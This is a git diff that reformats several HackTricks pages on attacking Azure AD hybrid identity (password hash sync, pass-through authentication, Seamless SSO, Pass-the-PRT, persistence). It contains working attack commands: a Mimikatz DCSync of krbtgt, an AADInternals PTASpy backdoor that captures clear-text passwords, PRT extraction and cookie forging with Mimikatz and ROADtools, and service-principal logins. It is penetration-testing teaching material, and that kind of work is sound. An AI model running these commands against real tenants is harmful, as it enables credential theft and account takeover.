-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} ## Basic Information [From the docs:](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/whatis-phs) **Password hash synchronization** is one of the sign-in methods used to accomplish hybrid identity. **Azure AD Connect** synchronizes a hash, of the hash, of a user's password from an on-premises Active Directory instance to a cloud-based Azure AD instance. -
+
It's the **most common method** used by companies to synchronize an on-prem AD with Azure AD. @@ -36,8 +23,8 @@ When an on-prem user wants to access an Azure resource, the **authentication tak When PHS is configured some **privileged accounts** are automatically **created**: -* The account **`MSOL_`** is automatically created in on-prem AD. This account is given a **Directory Synchronization Accounts** role (see [documentation](https://docs.microsoft.com/en-us/azure/active-directory/users-groups-roles/directory-assign-admin-roles#directory-synchronization-accounts-permissions)) which means that it has **replication (DCSync) permissions in the on-prem AD**. -* An account **`Sync__installationID`** is created in Azure AD. This account can **reset password of ANY user** (synced or cloud only) in Azure AD. +- The account **`MSOL_`** is automatically created in on-prem AD. This account is given a **Directory Synchronization Accounts** role (see [documentation](https://docs.microsoft.com/en-us/azure/active-directory/users-groups-roles/directory-assign-admin-roles#directory-synchronization-accounts-permissions)) which means that it has **replication (DCSync) permissions in the on-prem AD**. +- An account **`Sync__installationID`** is created in Azure AD. This account can **reset password of ANY user** (synced or cloud only) in Azure AD. Passwords of the two previous privileged accounts are **stored in a SQL server** on the server where **Azure AD Connect is installed.** Admins can extract the passwords of those privileged users in clear-text.\ The database is located in `C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf`. 
@@ -73,9 +60,8 @@ runas /netonly /user:defeng.corp\MSOL_123123123123 cmd Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt /domain:domain.local /dc:dc.domain.local"' ``` -{% hint style="danger" %} -You can also use [**adconnectdump**](https://github.com/dirkjanm/adconnectdump) to obtain these credentials. -{% endhint %} +> [!CAUTION] +> You can also use [**adconnectdump**](https://github.com/dirkjanm/adconnectdump) to obtain these credentials. ### Abusing Sync\_\* 
@@ -115,36 +101,22 @@ Set-AADIntUserPassword -CloudAnchor "User_19385ed9-sb37-c398-b362-12c387b36e37" It's also possible to dump the password of this user. -{% hint style="danger" %} -Another option would be to **assign privileged permissions to a service principal**, which the **Sync** user has **permissions** to do, and then **access that service principal** as a way of privesc. -{% endhint %} +> [!CAUTION] +> Another option would be to **assign privileged permissions to a service principal**, which the **Sync** user has **permissions** to do, and then **access that service principal** as a way of privesc. ### Seamless SSO It's possible to use Seamless SSO with PHS, which is vulnerable to other abuses. Check it in: -{% content-ref url="seamless-sso.md" %} -[seamless-sso.md](seamless-sso.md) -{% endcontent-ref %} +{{#ref}} +seamless-sso.md +{{#endref}} ## References -* [https://learn.microsoft.com/en-us/azure/active-directory/hybrid/whatis-phs](https://learn.microsoft.com/en-us/azure/active-directory/hybrid/whatis-phs) -* [https://aadinternals.com/post/on-prem\_admin/](https://aadinternals.com/post/on-prem_admin/) -* [https://troopers.de/downloads/troopers19/TROOPERS19\_AD\_Im\_in\_your\_cloud.pdf](https://troopers.de/downloads/troopers19/TROOPERS19_AD_Im_in_your_cloud.pdf) -* [https://www.youtube.com/watch?v=xei8lAPitX8](https://www.youtube.com/watch?v=xei8lAPitX8) +- [https://learn.microsoft.com/en-us/azure/active-directory/hybrid/whatis-phs](https://learn.microsoft.com/en-us/azure/active-directory/hybrid/whatis-phs) +- [https://aadinternals.com/post/on-prem_admin/](https://aadinternals.com/post/on-prem_admin/) +- [https://troopers.de/downloads/troopers19/TROOPERS19_AD_Im_in_your_cloud.pdf](https://troopers.de/downloads/troopers19/TROOPERS19_AD_Im_in_your_cloud.pdf) +- [https://www.youtube.com/watch?v=xei8lAPitX8](https://www.youtube.com/watch?v=xei8lAPitX8) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert 
(ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md new file mode 100644 index 000000000..dcf4d820c --- /dev/null +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md @@ -0,0 +1,70 @@ +# Az - PTA - Pass-through Authentication + +{{#include ../../../../banners/hacktricks-training.md}} + +## Basic Information + +[From the docs:](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/how-to-connect-pta) Azure Active Directory (Azure AD) Pass-through Authentication allows your users to **sign in to both on-premises and cloud-based applications using the same passwords**. This feature provides your users a better experience - one less password to remember, and reduces IT helpdesk costs because your users are less likely to forget how to sign in. When users sign in using Azure AD, this feature **validates users' passwords directly against your on-premises Active Directory**. + +In PTA **identities** are **synchronized** but **passwords** **aren't** like in PHS. + +The authentication is validated in the on-prem AD and the communication with cloud is done by an **authentication agent** running in an **on-prem server** (it does't need to be on the on-prem DC). + +### Authentication flow + +
+ +1. To **login** the user is redirected to **Azure AD**, where he sends the **username** and **password** +2. The **credentials** are **encrypted** and set in a **queue** in Azure AD +3. The **on-prem authentication agent** gathers the **credentials** from the queue and **decrypts** them. This agent is called **"Pass-through authentication agent"** or **PTA agent.** +4. The **agent** **validates** the creds against the **on-prem AD** and sends the **response** **back** to Azure AD which, if the response is positive, **completes the login** of the user. + +> [!WARNING] +> If an attacker **compromises** the **PTA** he can **see** the all **credentials** from the queue (in **clear-text**).\ +> He can also **validate any credentials** to the AzureAD (similar attack to Skeleton key). + +### On-Prem -> cloud + +If you have **admin** access to the **Azure AD Connect server** with the **PTA** **agent** running, you can use the **AADInternals** module to **insert a backdoor** that will **validate ALL the passwords** introduced (so all passwords will be valid for authentication): + +```powershell +Install-AADIntPTASpy +``` + +> [!NOTE] +> If the **installation fails**, this is probably due to missing [Microsoft Visual C++ 2015 Redistributables](https://download.microsoft.com/download/6/A/A/6AA4EDFF-645B-48C5-81CC-ED5963AEAD48/vc_redist.x64.exe). + +It's also possible to **see the clear-text passwords sent to PTA agent** using the following cmdlet on the machine where the previous backdoor was installed: + +```powershell +Get-AADIntPTASpyLog -DecodePasswords +``` + +This backdoor will: + +- Create a hidden folder `C:\PTASpy` +- Copy a `PTASpy.dll` to `C:\PTASpy` +- Injects `PTASpy.dll` to `AzureADConnectAuthenticationAgentService` process + +> [!NOTE] +> When the AzureADConnectAuthenticationAgent service is restarted, PTASpy is “unloaded” and must be re-installed. 
+ +### Cloud -> On-Prem + +> [!CAUTION] +> After getting **GA privileges** on the cloud, it's possible to **register a new PTA agent** by setting it on an **attacker controlled machine**. Once the agent is **setup**, we can **repeat** the **previous** steps to **authenticate using any password** and also, **get the passwords in clear-text.** + +### Seamless SSO + +It's possible to use Seamless SSO with PTA, which is vulnerable to other abuses. Check it in: + +{{#ref}} +seamless-sso.md +{{#endref}} + +## References + +- [https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-pta](https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-pta) +- [https://aadinternals.com/post/on-prem_admin/#pass-through-authentication](https://aadinternals.com/post/on-prem_admin/#pass-through-authentication) + +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md similarity index 61% rename from pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md rename to src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md index 75a5557f0..a9039c850 100644 --- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md 
@@ -1,25 +1,12 @@ # Az - Seamless SSO -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} ## Basic Information [From the docs:](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/how-to-connect-sso) Azure Active Directory Seamless Single Sign-On (Azure AD Seamless SSO) automatically **signs users in when they are on their corporate devices** connected to your corporate network. When enabled, **users don't need to type in their passwords to sign in to Azure AD**, and usually, even type in their usernames. This feature provides your users easy access to your cloud-based applications without needing any additional on-premises components. -

https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/how-to-connect-sso-how-it-works

+

https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/how-to-connect-sso-how-it-works

Basically Azure AD Seamless SSO **signs users** in when they are **on a on-prem domain joined PC**. 
@@ -74,47 +61,43 @@ To utilize the silver ticket, the following steps should be executed: 1. **Initiate the Browser:** Mozilla Firefox should be launched. 2. **Configure the Browser:** - * Navigate to **`about:config`**. - * Set the preference for [network.negotiate-auth.trusted-uris](https://github.com/mozilla/policy-templates/blob/master/README.md#authentication) to the specified [values](https://docs.microsoft.com/en-us/azure/active-directory/connect/active-directory-aadconnect-sso#ensuring-clients-sign-in-automatically): - * `https://aadg.windows.net.nsatc.net` - * `https://autologon.microsoftazuread-sso.com` + - Navigate to **`about:config`**. + - Set the preference for [network.negotiate-auth.trusted-uris](https://github.com/mozilla/policy-templates/blob/master/README.md#authentication) to the specified [values](https://docs.microsoft.com/en-us/azure/active-directory/connect/active-directory-aadconnect-sso#ensuring-clients-sign-in-automatically): + - `https://aadg.windows.net.nsatc.net` + - `https://autologon.microsoftazuread-sso.com` 3. **Access the Web Application:** - * Visit a web application that is integrated with the organization's AAD domain. A common example is [Office 365](https://portal.office.com/). + - Visit a web application that is integrated with the organization's AAD domain. A common example is [Office 365](https://portal.office.com/). 4. **Authentication Process:** - * At the logon screen, the username should be entered, leaving the password field blank. - * To proceed, press either TAB or ENTER. + - At the logon screen, the username should be entered, leaving the password field blank. + - To proceed, press either TAB or ENTER. 
-{% hint style="success" %} -This doesn't bypass MFA if enabled -{% endhint %} +> [!TIP] +> This doesn't bypass MFA if enabled #### Option 2 without dcsync - SeamlessPass It's also possible to perform this attack **without a dcsync attack** to be more stealth as [explained in this blog post](https://malcrove.com/seamlesspass-leveraging-kerberos-tickets-to-access-the-cloud/). For that you only need one of the following: -* **A compromised user's TGT:** Even if you don't have one but the user was compromised,you can get one using fake TGT delegation trick implemented in many tools such as [Kekeo](https://x.com/gentilkiwi/status/998219775485661184) and [Rubeus](https://posts.specterops.io/rubeus-now-with-more-kekeo-6f57d91079b9). -* **Golden Ticket**: If you have the KRBTGT key, you can create the TGT you need for the attacked user. -* **A compromised user’s NTLM hash or AES key:** SeamlessPass will communicate with the domain controller with this information to generate the TGT -* **AZUREADSSOACC$ account NTLM hash or AES key:** With this info and the user’s Security Identifier (SID) to attack it's possible to create a service ticket an authenticate with the cloud (as performed in the previous method). +- **A compromised user's TGT:** Even if you don't have one but the user was compromised,you can get one using fake TGT delegation trick implemented in many tools such as [Kekeo](https://x.com/gentilkiwi/status/998219775485661184) and [Rubeus](https://posts.specterops.io/rubeus-now-with-more-kekeo-6f57d91079b9). +- **Golden Ticket**: If you have the KRBTGT key, you can create the TGT you need for the attacked user. 
+- **A compromised user’s NTLM hash or AES key:** SeamlessPass will communicate with the domain controller with this information to generate the TGT +- **AZUREADSSOACC$ account NTLM hash or AES key:** With this info and the user’s Security Identifier (SID) to attack it's possible to create a service ticket an authenticate with the cloud (as performed in the previous method). Finally, with the TGT it's possible to use the tool [**SeamlessPass**](https://github.com/Malcrove/SeamlessPass) with: -{% code overflow="wrap" %} ``` seamlesspass -tenant corp.com -domain corp.local -dc dc.corp.local -tgt ``` -{% endcode %} Further information to set Firefox to work with seamless SSO can be [**found in this blog post**](https://malcrove.com/seamlesspass-leveraging-kerberos-tickets-to-access-the-cloud/). #### ~~Creating Kerberos tickets for cloud-only users~~ -If the Active Directory administrators have access to Azure AD Connect, they can **set SID for any cloud-user**. This way Kerberos **tickets** can be **created also for cloud-only users**. The only requirement is that the SID is a proper [SID](https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc778824\(v=ws.10\)). +If the Active Directory administrators have access to Azure AD Connect, they can **set SID for any cloud-user**. This way Kerberos **tickets** can be **created also for cloud-only users**. The only requirement is that the SID is a proper [SID](). -{% hint style="danger" %} -Changing SID of cloud-only admin users is now **blocked by Microsoft**.\ -For info check [https://aadinternals.com/post/on-prem\_admin/](https://aadinternals.com/post/on-prem_admin/) -{% endhint %} +> [!CAUTION] +> Changing SID of cloud-only admin users is now **blocked by Microsoft**.\ +> For info check [https://aadinternals.com/post/on-prem_admin/](https://aadinternals.com/post/on-prem_admin/) ### On-prem -> Cloud via Resource Based Constrained Delegation 
@@ -126,22 +109,9 @@ python rbdel.py -u \\ -p azureadssosvc$ ## References -* [https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-sso](https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-sso) -* [https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/](https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/) -* [https://aadinternals.com/post/on-prem\_admin/](https://aadinternals.com/post/on-prem_admin/) -* [TR19: I'm in your cloud, reading everyone's emails - hacking Azure AD via Active Directory](https://www.youtube.com/watch?v=JEIR5oGCwdg) +- [https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-sso](https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-sso) +- [https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/](https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/) +- [https://aadinternals.com/post/on-prem_admin/](https://aadinternals.com/post/on-prem_admin/) +- [TR19: I'm in your cloud, reading everyone's emails - hacking Azure AD via Active Directory](https://www.youtube.com/watch?v=JEIR5oGCwdg) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.md similarity index 63% rename from pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.md rename to src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.md index 4cef6beb1..28c96b512 100644 --- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.md @@ -1,25 +1,12 @@ # Az - Pass the PRT -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## What is a PRT -{% content-ref url="az-primary-refresh-token-prt.md" %} -[az-primary-refresh-token-prt.md](az-primary-refresh-token-prt.md) -{% endcontent-ref %} +{{#ref}} +az-primary-refresh-token-prt.md +{{#endref}} ### Check if you have a PRT @@ -29,11 +16,11 @@ Dsregcmd.exe /status In the SSO State section, you should see the **`AzureAdPrt`** set to **YES**. -
+
In the same output you can also see if the **device is joined to Azure** (in the field `AzureAdJoined`): -
+
## PRT Cookie @@ -61,7 +48,7 @@ The **KDF context is** a nonce from AzureAD and the PRT creating a **JWT** mixed Therefore, even if the PRT cannot be extracted because it's located inside the TPM, it's possible to abuseLSASS to **request derived keys from new contexts and use the generated keys to sign Cookies**. -
+
## PRT Abuse Scenarios @@ -109,11 +96,9 @@ Then you can use [**roadtoken**](https://github.com/dirkjanm/ROADtoken) to get a As oneliner: -{% code overflow="wrap" %} ```powershell Invoke-Command - Session $ps_sess -ScriptBlock{C:\Users\Public\PsExec64.exe - accepteula -s "cmd.exe" " /c C:\Users\Public\SessionExecCommand.exe UserToImpersonate C:\Users\Public\ROADToken.exe AwABAAAAAAACAOz_BAD0__kdshsy61GF75SGhs_[...] > C:\Users\Public\PRT.txt"} ``` -{% endcode %} Then you can use the **generated cookie** to **generate tokens** to **login** using Azure AD **Graph** or Microsoft Graph: @@ -180,9 +165,8 @@ HttpOnly: Set to True (checked) Then go to [https://portal.azure.com](https://portal.azure.com) -{% hint style="danger" %} -The rest should be the defaults. Make sure you can refresh the page and the cookie doesn’t disappear, if it does, you may have made a mistake and have to go through the process again. If it doesn’t, you should be good. -{% endhint %} +> [!CAUTION] +> The rest should be the defaults. Make sure you can refresh the page and the cookie doesn’t disappear, if it does, you may have made a mistake and have to go through the process again. If it doesn’t, you should be good. ### Attack - Mimikatz 
@@ -192,16 +176,14 @@ The rest should be the defaults. Make sure you can refresh the page and the cook 2. The **Session Key is extracted next**. Given that this key is initially issued and then re-encrypted by the local device, it necessitates decryption using a DPAPI masterkey. Detailed information about DPAPI (Data Protection API) can be found in these resources: [HackTricks](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords) and for an understanding of its application, refer to [Pass-the-cookie attack](az-pass-the-cookie.md). 3. Post decryption of the Session Key, the **derived key and context for the PRT are obtained**. These are crucial for the **creation of the PRT cookie**. Specifically, the derived key is employed for signing the JWT (JSON Web Token) that constitutes the cookie. A comprehensive explanation of this process has been provided by Dirk-jan, accessible [here](https://dirkjanm.io/digging-further-into-the-primary-refresh-token/). 
-{% hint style="danger" %} -Note that if the PRT is inside the TPM and not inside `lsass` **mimikatz won't be able to extract it**.\ -However, it will be possible to g**et a key from a derive key from a context** from the TPM and use it to **sign a cookie (check option 3).** -{% endhint %} +> [!CAUTION] +> Note that if the PRT is inside the TPM and not inside `lsass` **mimikatz won't be able to extract it**.\ +> However, it will be possible to g**et a key from a derive key from a context** from the TPM and use it to **sign a cookie (check option 3).** You can find an **in depth explanation of the performed process** to extract these details in here: [**https://dirkjanm.io/digging-further-into-the-primary-refresh-token/**](https://dirkjanm.io/digging-further-into-the-primary-refresh-token/) -{% hint style="warning" %} -This won't exactly work post August 2021 fixes to get other users PRT tokens as only the user can get his PRT (a local admin cannot access other users PRTs), but can access his. -{% endhint %} +> [!WARNING] +> This won't exactly work post August 2021 fixes to get other users PRT tokens as only the user can get his PRT (a local admin cannot access other users PRTs), but can access his. You can use **mimikatz** to extract the PRT: @@ -217,16 +199,15 @@ Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::cloudap"' (Images from https://blog.netwrix.com/2023/05/13/pass-the-prt-overview) -
+
**Copy** the part labeled **Prt** and save it.\ Extract also the session key (the **`KeyValue`** of the **`ProofOfPossesionKey`** field) which you can see highlighted below. This is encrypted and we will need to use our DPAPI masterkeys to decrypt it. -
+
-{% hint style="info" %} -If you don’t see any PRT data it could be that you **don’t have any PRTs** because your device isn’t Azure AD joined or it could be you are **running an old version** of Windows 10. -{% endhint %} +> [!NOTE] +> If you don’t see any PRT data it could be that you **don’t have any PRTs** because your device isn’t Azure AD joined or it could be you are **running an old version** of Windows 10. To **decrypt** the session key you need to **elevate** your privileges to **SYSTEM** to run under the computer context to be able to use the **DPAPI masterkey to decrypt it**. You can use the following commands to do so: @@ -235,27 +216,27 @@ token::elevate dpapi::cloudapkd /keyvalue:[PASTE ProofOfPosessionKey HERE] /unprotect ``` -
+
#### Option 1 - Full Mimikatz -* Now you want to copy both the Context value: +- Now you want to copy both the Context value: -
+
-* And the derived key value: +- And the derived key value: -
+
-* Finally you can use all this info to **generate PRT cookies**: +- Finally you can use all this info to **generate PRT cookies**: ```bash Dpapi::cloudapkd /context:[CONTEXT] /derivedkey:[DerivedKey] /Prt:[PRT] ``` -
+
-* Go to [https://login.microsoftonline.com](https://login.microsoftonline.com), clear all cookies for login.microsoftonline.com and enter a new cookie. +- Go to [https://login.microsoftonline.com](https://login.microsoftonline.com), clear all cookies for login.microsoftonline.com and enter a new cookie. ``` Name: x-ms-RefreshTokenCredential @@ -264,58 +245,40 @@ Path: / HttpOnly: Set to True (checked) ``` -* Then go to [https://portal.azure.com](https://portal.azure.com) +- Then go to [https://portal.azure.com](https://portal.azure.com) -{% hint style="danger" %} -The rest should be the defaults. Make sure you can refresh the page and the cookie doesn’t disappear, if it does, you may have made a mistake and have to go through the process again. If it doesn’t, you should be good. -{% endhint %} +> [!CAUTION] +> The rest should be the defaults. Make sure you can refresh the page and the cookie doesn’t disappear, if it does, you may have made a mistake and have to go through the process again. If it doesn’t, you should be good. #### Option 2 - roadrecon using PRT -* Renew the PRT first, which will save it in `roadtx.prt`: +- Renew the PRT first, which will save it in `roadtx.prt`: -{% code overflow="wrap" %} ```bash roadtx prt -a renew --prt --prt-sessionkey ``` -{% endcode %} -* Now we can **request tokens** using the interactive browser with `roadtx browserprtauth`. If we use the `roadtx describe` command, we see the access token includes an MFA claim because the PRT I used in this case also had an MFA claim. +- Now we can **request tokens** using the interactive browser with `roadtx browserprtauth`. If we use the `roadtx describe` command, we see the access token includes an MFA claim because the PRT I used in this case also had an MFA claim. ```bash roadtx browserprtauth roadtx describe < .roadtools_auth ``` -
+
#### Option 3 - roadrecon using derived keys Having the context and the derived key dumped by mimikatz, it's possible to use roadrecon to generate a new signed cookie with: -{% code overflow="wrap" %} ```bash roadrecon auth --prt-cookie --prt-context --derives-key ``` -{% endcode %} ## References -* [https://stealthbits.com/blog/lateral-movement-to-the-cloud-pass-the-prt/](https://stealthbits.com/blog/lateral-movement-to-the-cloud-pass-the-prt/) -* [https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/](https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/) -* [https://www.youtube.com/watch?v=x609c-MUZ\_g](https://www.youtube.com/watch?v=x609c-MUZ_g) +- [https://stealthbits.com/blog/lateral-movement-to-the-cloud-pass-the-prt/](https://stealthbits.com/blog/lateral-movement-to-the-cloud-pass-the-prt/) +- [https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/](https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/) +- [https://www.youtube.com/watch?v=x609c-MUZ_g](https://www.youtube.com/watch?v=x609c-MUZ_g) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/azure-security/az-permissions-for-a-pentest.md b/src/pentesting-cloud/azure-security/az-permissions-for-a-pentest.md new file mode 100644 index 000000000..6225d109c --- /dev/null +++ b/src/pentesting-cloud/azure-security/az-permissions-for-a-pentest.md @@ -0,0 +1,7 @@ +# Az - Permissions for a Pentest + +{{#include ../../banners/hacktricks-training.md}} + +To start the tests you should have access with a user with **Reader permissions over the subscription** and **Global Reader role in AzureAD**. If even in that case you are **not able to access the content of the Storage accounts** you can fix it with the **role Storage Account Contributor**. + +{{#include ../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/azure-security/az-persistence/README.md b/src/pentesting-cloud/azure-security/az-persistence/README.md similarity index 53% rename from pentesting-cloud/azure-security/az-persistence/README.md rename to src/pentesting-cloud/azure-security/az-persistence/README.md index 3e463b681..d686f7f78 100644 --- a/pentesting-cloud/azure-security/az-persistence/README.md +++ b/src/pentesting-cloud/azure-security/az-persistence/README.md @@ -1,19 +1,6 @@ # Az - Persistence -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ### Illicit Consent Grant @@ -31,21 +18,17 @@ An interesting role to add to the application would be **Privileged authenticati This technique also allows to **bypass MFA**. -{% code overflow="wrap" %} ```powershell $passwd = ConvertTo-SecureString "J~Q~QMt_qe4uDzg53MDD_jrj_Q3P.changed" -AsPlainText -Force $creds = New-Object System.Management.Automation.PSCredential("311bf843-cc8b-459c-be24-6ed908458623", $passwd) Connect-AzAccount -ServicePrincipal -Credential $credentials -Tenant e12984235-1035-452e-bd32-ab4d72639a ``` -{% endcode %} -* For certificate based authentication +- For certificate based authentication -{% code overflow="wrap" %} ```powershell Connect-AzAccount -ServicePrincipal -Tenant -CertificateThumbprint -ApplicationId ``` -{% endcode %} ### Federation - Token Signing Certificate @@ -80,19 +63,6 @@ Open-AADIntOffice365Portal -ImmutableID qIMPTm2Q3kimHgg4KQyveA== -Issuer "http:/ ## References -* [https://aadinternalsbackdoor.azurewebsites.net/](https://aadinternalsbackdoor.azurewebsites.net/) +- [https://aadinternalsbackdoor.azurewebsites.net/](https://aadinternalsbackdoor.azurewebsites.net/) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
